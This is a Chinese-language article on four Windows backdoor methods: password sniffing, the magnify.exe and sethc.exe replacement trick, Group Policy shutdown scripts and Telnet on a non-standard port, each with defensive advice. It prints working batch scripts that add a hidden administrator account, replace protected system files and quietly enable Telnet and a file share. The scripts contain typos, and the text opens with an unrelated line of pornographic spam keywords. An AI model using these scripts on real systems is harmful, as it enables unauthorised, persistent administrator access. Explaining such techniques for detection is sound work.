国产一级a片免费看高清,亚洲熟女中文字幕在线视频,黄三级高清在线播放,免费黄色视频在线看

后門是攻擊者出入系統(tǒng)的通道，惟其如此它隱蔽而危險。攻擊者利用后門技術(shù)如入無人之境，這是用戶的恥辱。針對Windows系統(tǒng)的后門是比較多的，對于一般的后門也為大家所熟知。下面筆者揭秘四個可能不為大家所了解但又非常危險的后門。

1、嗅探欺騙，最危險的后門

這類后門是攻擊者在控制了主機之后，并不創(chuàng)建新的帳戶而是在主機上安裝嗅探工具竊取管理員的密碼。由于此類后門，并不創(chuàng)建新的帳戶而是通過嗅探獲取的管理員密碼登錄系統(tǒng)，因此隱蔽性極高，如果管理員安全意識不高并缺少足夠的安全技能的話是根本發(fā)現(xiàn)不了的。
(1)安裝嗅探工具
　　攻擊者將相應(yīng)的嗅探工具上傳或者下載到服務(wù)器，然后安裝即可。需要說明的是這些嗅探工具一般體積很小并且功能單一，但是往往被做成驅(qū)動形式的，所以隱蔽性極高，很難發(fā)現(xiàn)也不宜清除。
(2)獲取管理員密碼
　　嗅探工具對系統(tǒng)進行實施監(jiān)控，當管理員登錄服務(wù)器時其密碼也就被竊取，然后嗅探工具會將管理員密碼保存到一個txt文件中。當攻擊者下一次登錄服務(wù)器后，就可以打開該txt文件獲取管理員密碼。此后他登錄服務(wù)器就再不用重新創(chuàng)建帳戶而是直接用合法的管理員帳戶登錄服務(wù)器。如果服務(wù)器是一個Web，攻擊者就會將該txt文件放置到某個web目錄下，然后在本地就可以瀏覽查看該文件了。
(3)防范措施
　　嗅探后門攻擊者以正常的管理員帳戶登錄系統(tǒng)，因此很難發(fā)現(xiàn)，不過任何入侵都會留下蛛絲馬跡，我們可以啟用組策略中的“審核策略”使其對用戶的登錄情況進行記錄，然后通過事件查看器查看是否有可疑時間的非法登錄。不過，一個高明的攻擊者他們會刪除或者修改系統(tǒng)日志，因此最徹底的措施是清除安裝在系統(tǒng)中的嗅探工具，然后更改管理員密碼。

2、放大鏡程序，最狡猾的后門

放大鏡(magnify.exe)是Windows 2000/XP/2003系統(tǒng)集成的一個小工具，它是為方便視力障礙用戶而設(shè)計的。在用戶登錄系統(tǒng)前可以通過“Win+U”組合鍵調(diào)用該工具，因此攻擊者就用精心構(gòu)造的magnify.exe同名文件替換放大鏡程序，從而達到控制服務(wù)器的目的。
　　通常情況下，攻擊者通過構(gòu)造的magnify.exe程序創(chuàng)建一個管理員用戶，然后登錄系統(tǒng)。當然有的時候他們也會通過其直接調(diào)用命令提示符(cmd.exe)或者系統(tǒng)shell(explorer.exe)。需要說明的是，這樣調(diào)用的程序都是system權(quán)限，即系統(tǒng)最高權(quán)限。不過，以防萬一當管理員在運行放大鏡程序時發(fā)現(xiàn)破綻，攻擊者一般通過該構(gòu)造程序完成所需的操作后，最后會運行真正的放大鏡程序，以蒙騙管理員。其利用的方法是：
思路：偽造替換 magnify.exe

(1) 構(gòu)造批處理腳本：magnify.bat

@echo off
net user hack$ test168 /add
net localgroup administrators hack$ /add
%Windir%\system32\nagnify.exe
exit12345

作用：先創(chuàng)建管理員用戶，在運行原來的放大鏡程序

(2)文件格式轉(zhuǎn)換
　　因為批處理文件magnify.bat的后綴是bat，必須要將其轉(zhuǎn)換為同名的exe文件才可以通過組合鍵Win+U調(diào)用。攻擊者一般可以利用WinRar構(gòu)造一個自動解壓的exe壓縮文件，當然也可以利用bat2com、com2exe進行文件格式的轉(zhuǎn)換。我們就以后面的方法為例進行演示。利用bat2com / com2exe，BatToEXE(圖形化工具)等工具把Bat文件轉(zhuǎn)換成exe文件，如：

bat2com magnify.bat 　　    將magnify.bat轉(zhuǎn)換成magnify.com
com2exe magnify.com 　　 將magnify.com轉(zhuǎn)換成magnify.exe12

(3)放大鏡文件替換
　　下面就需要用構(gòu)造的magnify.exe替換同名的放大鏡程序文件，由于Windows對系統(tǒng)文件的自我保護，因此不能直接替換，不過Windows提供了一個命令replace.exe，通過它我們可以替換系統(tǒng)文件。另外，由于系統(tǒng)文件在%Windir%\system32\dllcache中有備份，為了防止文件替換后又重新還原，所有我們首先要替換該目錄下的magnify.exe文件。假設(shè)構(gòu)造的magnify.exe文件在%Windir%目錄下，我們可以通過一個批處理即可實現(xiàn)文件的替換。

@echo off
copy %Windir%\system32\dllcache\magnify.exe nagnify.exe   　　將放大鏡程序備份為nagnify.exe
copy %Windir%\system32\magnify.exe nagnify.exe         
replace.exe %Windir%\magnify.exe %Windir%\system32\dllcache   替換放大鏡程序
replace.exe %Windir%\magnify.exe %Windir%\system32
exit123456

上面批處理的功能是，首先將放大鏡程序備份為nagnify.exe，然后用同名的構(gòu)造程序?qū)⑵涮鎿Q。

(4)攻擊利用
　　當完成上述操作后，一個放大鏡后門就做成了。然后攻擊者通過遠程桌面連接服務(wù)器，在登錄界面窗口摁下本地鍵盤的“Win+U”組合鍵，選擇運行其中的“放大鏡”，此刻就在服務(wù)器上創(chuàng)建了一個管理員用戶gslw$并打開了放大鏡工具，然后攻擊者就開業(yè)通過該帳戶登錄服務(wù)器。當然，攻擊者在斷開登錄前會刪除所有與該帳戶相關(guān)的信息，以防被管理員發(fā)現(xiàn)。
　　
(5)防范措施
　　進入%Windir%\system32\查看magnify.exe的文件圖標是否是原來的放大鏡的圖標，如果不是的話極有可能被植入了放大鏡后門。當然，有的時候攻擊者也會將其文件圖標更改為和原放大鏡程序的圖標一樣。此時我們可以查看magnify.exe文件的大小和修改時間，如果這兩樣有一項不符就比較懷疑了。我們也可以先運行magnify.exe，然后運行l(wèi)usrmgr.msc查看是否有可疑的用戶。如果確定服務(wù)器被放置了放大鏡后門，首先要刪除該文件，然后恢復(fù)正常的放大鏡程序。當然，我們也可以做得更徹底一些，用一個無關(guān)緊要的程序替換放大鏡程序。甚至我們也可以以其人之道還治其人之身，構(gòu)造一個magnify.exe，通過其警告攻擊者或者進行入侵監(jiān)控和取證。
　　補充：與放大鏡后門類似的還有“粘滯鍵”后門，即按下SHIEF鍵五次可以啟動粘滯鍵功能，其利用和防范措施與放大鏡后門類似，只是將magnify.exe換成了sethc.exe。

3、組策略欺騙，最隱蔽的后門

相對來說，組策略后門更加隱蔽。往冊表中添加相應(yīng)鍵值實現(xiàn)隨系統(tǒng)啟動而運行是木馬常用的伎倆，也為大家所熟知。其實，在最策略中也可以實現(xiàn)該功能，不僅如此它還可以實現(xiàn)在系統(tǒng)關(guān)機時進行某些操作。這就是通過最策略的“腳本(啟動/關(guān)機)”項來說實現(xiàn)。具體位置在“計算機配置→Windows設(shè)置”項下。因為其極具隱蔽性，因此常常被攻擊者利用來做服務(wù)器后門。
　　攻擊者獲得了服務(wù)器的控制權(quán)就可以通過這個后門實施對對主機的長期控制。它可以通過這個后門運行某些程序或者腳本，最簡單的比如創(chuàng)建一個管理員用戶，他可以這樣做：

(1)創(chuàng)建腳本

echo off 
net user hack$ test168 /add 
net localgroup administrators hack$ /add 
exit1234

(2)后門利用
　　在“運行”對話框中輸入gpedit.msc，定位到“計算機配置一>Windows設(shè)置一>腳本(啟動/關(guān)機)”, 雙擊右邊窗口的“關(guān)機”，在其中添加add.bat。就是說當系統(tǒng)關(guān)機時創(chuàng)建gslw$用戶。對于一般的用戶是根本不知道在系統(tǒng)中有一個隱藏用戶，就是他看見并且刪除了該帳戶，當系統(tǒng)關(guān)機時又會創(chuàng)建該帳戶。所以說，如果用戶不知道組策略中的這個地方那他一定會感到莫名其妙。
　　其實，對于組策略中的這個“后門”還有很多利用法，攻擊者通過它來運行腳本或者程序，嗅探管理員密碼等等。當他們獲取了管理員的密碼后，就不用在系統(tǒng)中創(chuàng)建帳戶了，直接利用管理員帳戶遠程登錄系統(tǒng)。因此它也是“雙刃劍”，希望大家重視這個地方。當你為服務(wù)器被攻擊而莫名其妙時，說不定攻擊者就是通過它實現(xiàn)的。

4、telnet欺騙，最容易被忽略的后門

telnet是命令行下的遠程登錄工具，不過在服務(wù)器管理時使用不多也常為管理員所忽視。攻擊者如果在控制一臺服務(wù)器后，開啟“遠程桌面”進行遠程控制非常容易被管理員察覺，但是啟動Telnet進行遠程控制卻不容易被察覺。不過，telnet的默認端口是23，如果開啟后，別人是很容易掃描到的，因此攻擊者會更改telnet的端口，從而獨享該服務(wù)器的控制權(quán)。
(1)修改端口

tlntadmn config port=2233 			//修改 telnet默認端口（初始23）
sc config tlntsvr start= auto
net start telnet123

一個批處理,可以根據(jù)需要修改。轉(zhuǎn)換成exe等等，思路很多。。。

@echo off 
sc config tlntsvr start= auto 
@net start telnet 
@tlntadmn config sec =passwd 
@tlntadmn config port = 2233
@net user hack& 123456789 /add 
@net localgroup administrators hack$ /add 
@pause 
@md c:\windows\ShareFolder
@net share MyShare=c:\windows\ShareFolder12345678910

(2)遠程登錄

攻擊者在本地運行命令提示符(cmd.exe)輸入命令“telnet 192.168.1.9 800”然后輸入用戶名及其密碼記錄telnet到服務(wù)器。

(3)防范措施

對于telnet后門的方法非常簡單，可以通過“tlntadmn config port=n”命令更改其端口，更徹底的運行“services.msc”打開服務(wù)管理器，禁用telnet服務(wù)。

總結(jié)

其實，不管什么樣的后門都有一個共同的特點——隱蔽性，是見不得陽光的。只要大家掌握一定的系統(tǒng)技術(shù)，并時刻提高警惕就能讓后門顯形。知己知彼，了解后門的原理，就能夠從根本上終結(jié)后門。